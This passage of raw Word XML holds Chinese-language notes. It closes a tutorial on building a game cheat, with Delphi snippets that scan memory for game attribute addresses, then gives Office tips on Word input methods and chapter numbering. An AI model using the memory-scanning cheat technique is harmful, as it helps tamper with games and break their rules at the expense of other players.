        <w:t>compare (</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>isFirst:Boolean //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否是第一次进行搜索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aType:Integer //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索分析类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">):Boolean </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在搜索分析时为了提高搜索效率、实现业务逻辑，那么需要传入一个参数，从而确认是否是第一次进行内存。搜索分析类型有两种：如果参数值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么就代表增量搜索。如果参数值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么就代表减量搜索。其应用实例如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if RadioButton1.Checked then v:=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>else v:=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>maxV:=1024*1024*1024;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>maxV:=2*MaxV;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>minV:=4*1024*1024;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>with MpMemCtl1 do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MaxAddress:=maxV;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MinAddress:=minV;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ShowGauge:=Gauge1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>compare(first,v);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>end;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">if first then first:=false; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　五、得到内存地址值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在控件中，提供获得分析后内存地址列表的方法，只需要调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getAddressList()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，便可以获得分析过程中或分析结果地址列表。但如果使用的是按内存变化增减量进行搜索分析的方法，那么第一次可能会搜索出来很多的地址，致使返回速度过长，那么建议使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getAddressCount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（）方法确定返回列表为一定长度后才给予返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getAddressList():TStrings //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回地址字符串列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getAddressCount():Integer //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回地址字符串列表长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　其应用实例如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if MpMemCtl1.getAddressCount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;100 then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">listbox1.Items:=MpMemCtl1.getAddressList(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　通过以上五个步骤，便可以整合成一个功能比较完备的，基于内存控制方法的游戏外挂。有了“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的关键部份功能。利用此工具，通过一些方法，不仅仅可以分析出来游戏属性单内存地址，而且可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>分析出一部份多内存游戏属性存放地址。既然不能洁身自好，不如就同流合污吧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的群：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3595054  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00510188" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>&lt;PIXTEL_MMI_EBOOK_2005&gt;17</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office2010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入法在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中不显示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>shift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以切换中英文</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ctrl+shift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以切换中英文</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ctrl+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空格可以切换中英文</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标点击状态栏的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>英</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以切换中英文</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ctrl+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逗号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>右键点击搜狗输入法状态栏，设置属性，勾选“搜狗风格”，确定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果还不行可能是关闭了高级语言服务，检查一下，控制面板→区域与语言选项→语言→详细信息→高级→关闭高级语言服务，这个不要勾选。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中不能使用输入法的处理方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>word2003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>菜单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择‘编辑’的选项卡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不要勾</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>选‘输入法控制处于活动状态’→确定。关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，重新打开。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>word2007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>左上角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>office</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>菜单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不要勾选‘输入法控制处于活动状态’→确定。关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，重新打开。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E57A01" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>word2010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>word2007</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office2003</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Wo</w:t>
      </w:r>
      <w:r w:rsidRPr="004621F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于章节自动编号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样式和格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>右边会出现如图所示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1981200" cy="4219575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="11" name="图片 11" descr="说明: C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\B9~7ENOVA7PZ5]3DACBB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C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\B9~7ENOVA7PZ5]3DACBBO$2.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981200" cy="4219575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>确定你的章节标题是属于几级标题,例如 1第一章 ,那么 第一章 就属于一级标题, 2.3.5 瓦斯吸附 那么 瓦斯吸附 就属于三级标题,几级标题就对应上图</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
